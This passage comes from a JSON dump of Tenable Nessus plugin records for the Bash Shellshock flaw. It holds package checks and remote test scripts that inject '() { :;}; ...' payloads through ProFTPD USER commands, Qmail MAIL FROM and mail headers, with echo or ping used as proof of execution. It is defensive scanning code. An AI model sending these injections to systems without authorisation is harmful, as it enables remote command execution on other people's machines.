(!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Solaris/showrev\")) audit(AUDIT_OS_NOT, \"Solaris 10 or earlier\");\nif (!get_kb_item(\"Host/Solaris/pkginfo\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"126546-06\", obsoleted_by:\"\", package:\"SUNWbash\", version:\"11.10.0,REV=2005.01.08.05.16\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"126546-06\", obsoleted_by:\"\", package:\"SUNWbashS\", version:\"11.10.0,REV=2005.01.08.05.16\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:22:10", "description": "The remote FTP server is affected by a remote code execution vulnerability due to an error in the Bash shell running on the remote host. A remote, unauthenticated attacker can execute arbitrary code on the remote host by sending a specially crafted request via the USER FTP command. The 'mod_exec' module exports the attacker-supplied username as an environment variable, which is then evaluated by Bash as code.", "cvss3": {}, "published": "2014-09-30T00:00:00", "type": "nessus", "title": "GNU Bash Environment Variable Handling Code Injection via ProFTPD (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:gnu:bash", "cpe:/a:proftpd:proftpd"], "id": "PROFTPD_BASH_INJECTION.NASL", "href": "https://www.tenable.com/plugins/nessus/77986", "sourceData": "#TRUSTED 0472808d52e3c8acea49514430fa2b60e5fc1800e6ce6cb496c78f62cc2b5a6a6f1653fa2b694df03ab098635dd367565c477886293254df657e530cc658cb2bdf14b6f52680d472caddae34f3cd2f2582d67db322d621089a5384a262a7b3a342a607dbfe6d12efc34144e0f3a6c522afc3e36a3c6c738ca57a43b01ff75c7409db58a34a4ffb42cbd45a4cf5d548e48158c08aee84f28f67fc451fa63ead4a379baabcaa26d18c7b8d8ac052d24a9b74f51d23d14b44579603e206ca411022414dccc97cf0b813fa36e635efee308bc3a5a59d9c1dfecac11475f31ceaf35e9d1d7dee8731ccce27ec3a6cb3687f007268db97e4fb16e0bf10acb4c8c04b23011ca2a08cadd16d8165831b8ff326a0d4730d0eed93fd0392dde47e3d28ea1ad1e66b6c230ac29008760c0d407f21d41e915759ba00ac47dd611e9f0c52611f596e350240138208c9569b98be78c8f260ebd882d818239db3d2c01f078476fa5767079940c610e6bcc56282dd284160a22b910a2d7955065d7aa5a89437860a2e6c874462633f01fc52666d867361412c5e86e2703fbce9830f9541e6a8edc5dfb7be9499db1a3653ef1a242094ce8a6b46d3a3ee260ffaf9409f7774efd8dbda679e971b3e787e308744ca277a1ed20183d005d804be7f5ac59e7f6c0ba954aed1e17f9cba8346707845ce678fd80da94c4f1896faa4ee6fd90ab0abcba5b0\n#TRUST-RSA-SHA256 94f8cd57ea3dcf6741e89aec44a2bb43a2129fac6c85a2aa52447a958de2a86269063889f2e2d7970c31f5c31d06f4b5a5364f83bd1bd09c84502abd0fe841f3c525d311f3c31659d4d412b955fd9cfdbd155de897dd763c2931c74157f9dbe50ce913beba2f9a8c9a5ffc7a5bb2073ffe964fd94c3de1ca89e10ec62ffad186c9e631d9e29dcddddfafcf529b6c70ed8c1d0d1d256b111e639a40d3bf5a0d184a90b87cc034f7f3d6f49821336189782c197817b21da1445d5c2034b020f1ab532a838618165949aad4bedadc484450ef55d28df67d459d4917c5d42870951b48e10721dcb4f5e09d974093f09ffe32a44bf22b4f059b722a1554dd5d880d951d6aead9ee3cba1abe67e181873d7ba08bdec53008aed7fbe199305270ff663010038c77603b69e93fef809a24a6fdd43a9dc122f5a26e3460ed9682abd6aed322dca5ff5c85273d8d11f093982c87936bd7231139447c220bcc618a959554c4dfeb0d1e2e3f20a02908882a96c77da11bdd928b44a0718a437cb81ce5a0a1fb833420a1dc48a98392f58bcc3c62ae6d9539e723dd81fe273ab07ed6ce06aadbe7d787311a3cc7bf2fb898669978aa427dbfcbb26f2cac5d2caad5ec5077173d6217be6e7ef39b5b890d18b9d91b2efe9c4cdf0512bacaa7a96869c10194667c4105386f346501cb0442d1b77f4632aa83be9e7e1f7179e68d479de627d48c76\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77986);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"GNU Bash Environment Variable Handling Code Injection via ProFTPD (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FTP server is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote FTP server is affected by a remote code execution\nvulnerability due to an error in the Bash shell running on the remote\nhost. A remote, unauthenticated attacker can execute arbitrary code on\nthe remote host by sending a specially crafted request via the USER\nFTP command. The 'mod_exec' module exports the attacker-supplied\nusername as an environment variable, which is then evaluated by Bash\nas code.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.proftpd.org/docs/contrib/mod_exec.html#ExecEnviron\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the referenced patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-6271\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:proftpd:proftpd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"FTP\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ftpserver_detect_type_nd_version.nasl\", \"ftp_starttls.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/ftp\", 21);\n script_timeout(600);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"ftp_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"kerberos_func.inc\");\ninclude(\"ldap_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"nntp_func.inc\");\ninclude(\"rsync.inc\");\ninclude(\"smtp_func.inc\");\ninclude(\"ssl_funcs.inc\");\ninclude(\"telnet2_func.inc\");\n\nport = get_ftp_port(default:21);\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nfunction ftp_open(port)\n{\n local_var encaps, soc;\n\n encaps = get_port_transport(port);\n if (encaps > ENCAPS_IP)\n {\n if (get_kb_item(\"global_settings/disable_test_ssl_based_services\"))\n exit(1, \"Not testing SSL based services per user config.\");\n soc = open_sock_ssl(port, encaps:encaps);\n }\n else soc = open_sock_tcp(port, transport:ENCAPS_IP);\n if (!soc) audit(AUDIT_SOCK_FAIL, port);\n\n # Discard banner\n ftp_debug(str:\"custom banner\");\n ftp_recv_line(socket:soc);\n\n return soc;\n}\n\n# Attempt to get the service to echo something back to us, if the\n# 'ExecOptions sendStdout' option is set.\n\necho_injection = '() { :;}; echo \"NESSUS-e07ad3ba-$((17 + 12))-59f8d00f4bdf\"';\necho_response = 'NESSUS-e07ad3ba-29-59f8d00f4bdf';\n\nsocket = ftp_open(port:port);\n\nsend(socket:socket, data:\"USER \" + echo_injection + '\\r\\n');\nres = recv(socket:socket, length:2000, min:2000, timeout:60);\n\nftp_close(socket:socket);\n\nif (echo_response >< res)\n{\n report = NULL;\n if (report_verbosity > 0)\n {\n report =\n '\\n' + 'Nessus was able to determine that the remote host is vulnerable to the ' +\n '\\n' + 'Shellshock vulnerability by evaluating a simple math equation, injected ' +\n '\\n' + 'through the ProFTPD service on port ' + port + '. The service allowed injection ' +\n '\\n' + \"via the '%U' mod_exec 'cookie'.\" +\n '\\n';\n }\n security_hole(port:port, extra:report);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"FTP server\", port);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:22:37", "description": "The remote host appears to be running Qmail. A remote attacker can exploit Qmail to execute commands via a specially crafted MAIL FROM header if the remote host has a vulnerable version of Bash. This is due to the fact that Qmail does not properly sanitize input before setting environmental variables.\n\nA negative result from this plugin does not prove conclusively that the remote system is not affected by Shellshock, only that Qmail could not be used to exploit the Shellshock flaw.", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Qmail Remote Command Execution via Shellshock", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:qmail:qmail", "cpe:/a:gnu:bash"], "id": "SHELLSHOCK_QMAIL.NASL", "href": "https://www.tenable.com/plugins/nessus/77970", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77970);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Qmail Remote Command Execution via Shellshock\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote mail server allows remote command execution via Shellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to be running Qmail. A remote attacker can\nexploit Qmail to execute commands via a specially crafted MAIL FROM\nheader if the remote host has a vulnerable version of Bash. This is\ndue to the fact that Qmail does not properly sanitize input before\nsetting environmental variables.\n\nA negative result from this plugin does not prove conclusively that\nthe remote system is not affected by Shellshock, only that Qmail could\nnot be used to exploit the Shellshock flaw.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the referenced Bash patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:qmail:qmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"SMTP problems\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smtpserver_detect.nasl\");\n script_require_keys(\"Settings/ThoroughTests\");\n script_require_ports(\"Services/smtp\", 25);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smtp_func.inc\");\n\nif (! thorough_tests ) audit(AUDIT_THOROUGH);\n\nport = get_service(svc: \"smtp\", default: 25, exit_on_fail: 1);\n\n# Don't really care if its not qmail\nisqm = get_kb_item(\"SMTP/\"+port+\"/qmail\");\nif(isnull(isqm) || !isqm) audit(AUDIT_NOT_DETECT,\"Qmail\",port);\n\n# Don't bother if we cant open a proper port\nsoc = smtp_open(port:port, helo:this_host_name());\nif (!soc) audit(AUDIT_SVC_FAIL,\"SMTP\",port);\nclose(soc);\n\nusers = make_list(\n \"admin\",\n \"qmail\",\n \"root\",\n \"alias\",\n \"qmail-postmaster\",\n \"qmail-abuse\",\n \"qmail-root\"\n);\ntraitor = NULL;\n\nforeach user (users)\n{\n # Open a connection. Skip to next user if we fail\n soc = smtp_open(port:port, helo:this_host_name());\n if (!soc) continue;\n ptrn = hexstr(rand_str(length:15));\n attk = \"() { :;}; ping -p \"+ptrn+\" -c 3 \"+this_host_name();\n\n send(socket:soc,data:'MAIL FROM: <'+attk+'>\\r\\n');\n s = smtp_recv_line(socket:soc);\n if(!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n {\n close(soc);\n continue; # Next user\n }\n # Has to be a valid user on the system, we try defaults\n send(socket:soc,data:'RCPT TO: <'+user+'@'+get_host_name()+'>\\r\\n');\n s = smtp_recv_line(socket:soc);\n if(!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n {\n close(soc);\n continue; # Next user\n }\n send(socket:soc,data:'DATA\\r\\n');\n s = smtp_recv_line(socket:soc);\n if(!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n {\n close(soc);\n continue; # Next user\n }\n\n # See if we get a response\n filter = string(\"icmp and icmp[0] = 8 and src host \", get_host_ip());\n s = send_capture(socket:soc,data:'Subject:Vuln\\r\\n.\\r\\n',pcap_filter:filter);\n s = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\n close(soc);\n\n # No response, meaning we didn't get in\n if(isnull(s) || ptrn >!< s) continue; # Next user\n\n # We got in, that's good enough\n traitor = user;\n break;\n}\n\n# Couldn't get in\nif(isnull(traitor)) audit(AUDIT_LISTEN_NOT_VULN,\"Qmail\",port);\n\ntraitor = traitor+\"@\"+get_host_name();\nif(report_verbosity > 0)\n{\n report = \"Nessus was able to execute a remote command by sending a message to \"+traitor+'\\n';\n security_hole(port:port,extra:report);\n} else security_hole(port);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:23:15", "description": "The remote host appears to be running a mail transfer or mail delivery agent such as Courier, Exim, Postfix, or Procmail. Many of these agents can be configured to run utility scripts for a diverse number of tasks including filtering, sorting, and delivering mail. These scripts may create the conditions that are exploitable, making the agent vulnerable to remote code execution via Shellshock.\n\nA negative result from this plugin does not prove conclusively that the remote system is not affected by Shellshock, only that the mail agent running on the system is not configured in such a way to allow remote execution via Shellshock.", "cvss3": {}, "published": "2014-10-28T00:00:00", "type": "nessus", "title": "Mail Transfer Agent and Mail Delivery Agent Remote Command Execution via Shellshock", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:gnu:bash"], "id": "SHELLSHOCK_MAIL_AGENTS.NASL", "href": "https://www.tenable.com/plugins/nessus/78701", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78701);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"EDB-ID\", value:\"34896\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Mail Transfer Agent and Mail Delivery Agent Remote Command Execution via Shellshock\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a mail agent installed that allows remote command\nexecution via Shellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to be running a mail transfer or mail delivery\nagent such as Courier, Exim, Postfix, or Procmail. Many of these\nagents can be configured to run utility scripts for a diverse number\nof tasks including filtering, sorting, and delivering mail. These\nscripts may create the conditions that are exploitable, making the\nagent vulnerable to remote code execution via Shellshock.\n\nA negative result from this plugin does not prove conclusively that\nthe remote system is not affected by Shellshock, only that the mail\nagent running on the system is not configured in such a way to allow\nremote execution via Shellshock.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the referenced Bash patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"SMTP problems\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smtpserver_detect.nasl\");\n script_require_ports(\"Services/smtp\", 25);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smtp_func.inc\");\n\nport = get_service(svc: \"smtp\", default: 25, exit_on_fail: 1);\n\n# Open a connection.\nsoc = smtp_open(port:port, helo:this_host_name());\nif (!soc) audit(AUDIT_SVC_FAIL,\"SMTP\",port);\n\n# The data headers we want to try this attack on\nheaders = make_list(\n \"To:\",\n \"References:\",\n \"Cc:\",\n \"Bcc:\",\n \"From:\",\n \"Subject:\",\n \"Date:\",\n \"Message-ID:\",\n \"Comments:\",\n \"Keywords:\",\n \"Resent-Date:\",\n \"Resent-From:\",\n \"Resent-Sender:\"\n);\n\n#########################################################################################\n# Build header/data attacks\nptrn = rand_str(length:10);\ndata = \"\";\nid = 0;\nforeach head (headers)\n{\n hkey = hexstr(mkbyte(id));\n data += head+\"() { :;}; /bin/ping -p \"+hkey+hexstr(ptrn)+\" -c 3 \"+this_host_name()+'\\n';\n id += 1;\n}\nptrn = hexstr(ptrn);\n\nsend(socket:soc,data:'MAIL FROM: <>\\r\\n');\ns = smtp_recv_line(socket:soc);\nif (!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n{\n close(soc);\n audit(AUDIT_SVC_ERR,port);\n}\n\nsend(socket:soc,data:'RCPT TO: <nobody>\\r\\n');\ns = smtp_recv_line(socket:soc);\nif (!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n{\n close(soc);\n audit(AUDIT_SVC_ERR,port);\n}\n#########################################################################################\n# Send attack data\nsend(socket:soc,data:'DATA\\r\\n');\ns = smtp_recv_line(socket:soc);\nif (!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n{\n close(soc);\n audit(AUDIT_SVC_ERR,port);\n}\n\n# See if we get a response\nfilter = string(\"icmp and icmp[0] = 8 and src host \", get_host_ip());\ns = send_capture(socket:soc,data:data+'\\r\\n.\\r\\n',pcap_filter:filter);\ns = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\nclose(soc);\n\n# No response, meaning we didn't get in\nif (isnull(s) || ptrn >!< s) audit(AUDIT_LISTEN_NOT_VULN,\"Mail Agent\",port);\n\n# Figure out what let us in\nhkey = eregmatch(pattern:\"(\\d\\d)\"+ptrn,string:s);\n\n# Should never happen\nif (empty_or_null(hkey)) exit(1,\"Could not match pattern to response.\");\n\nhkey = int(getbyte(blob:hex2raw(s:hkey[1]),pos:0));\n\n# Should never happen\nif (hkey > max_index(headers)) exit(1, \"Strange header key in response.\");\n\nheader = headers[hkey];\nif (header == \"\")\n header = \"text contents\";\nelse\n header = \"'\"+str_replace(string:header, find:\":\", replace:\"\")+\"' header\";\n\nif (report_verbosity > 0)\n{\n report = 'The '+tolower(header)+' of the message was used to execute a remote command.';\n security_hole(port:port,extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:13:14", "description": "Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271 released in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was incomplete and could still allow some characters to be injected into another environment (CVE-2014-7169). With this update prefix and suffix for environment variable names which contain shell functions are added as hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are fixed which were revealed in Red Hat's internal analysis for these issues and also independently reported by Todd Sabin.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-03-26T00:00:00", "type": "nessus", "title": "Debian DLA-63-1 : bash security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:bash", "p-cpe:/a:debian:debian_linux:bash-builtins", "p-cpe:/a:debian:debian_linux:bash-doc", "p-cpe:/a:debian:debian_linux:bash-static", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DLA-63.NASL", "href": "https://www.tenable.com/plugins/nessus/82208", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-63-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82208);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Debian DLA-63-1 : bash security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271\nreleased in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was\nincomplete and could still allow some characters to be injected into\nanother environment (CVE-2014-7169). With this update prefix and\nsuffix for environment variable names which contain shell functions\nare added as hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat's internal analysis for these\nissues and also independently reported by Todd Sabin.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.debian.org/debian-lts-announce/2014/09/msg00020.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/squeeze-lts/bash\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bash-builtins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bash-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"bash\", reference:\"4.1-3+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"bash-builtins\", reference:\"4.1-3+deb6u2\")) 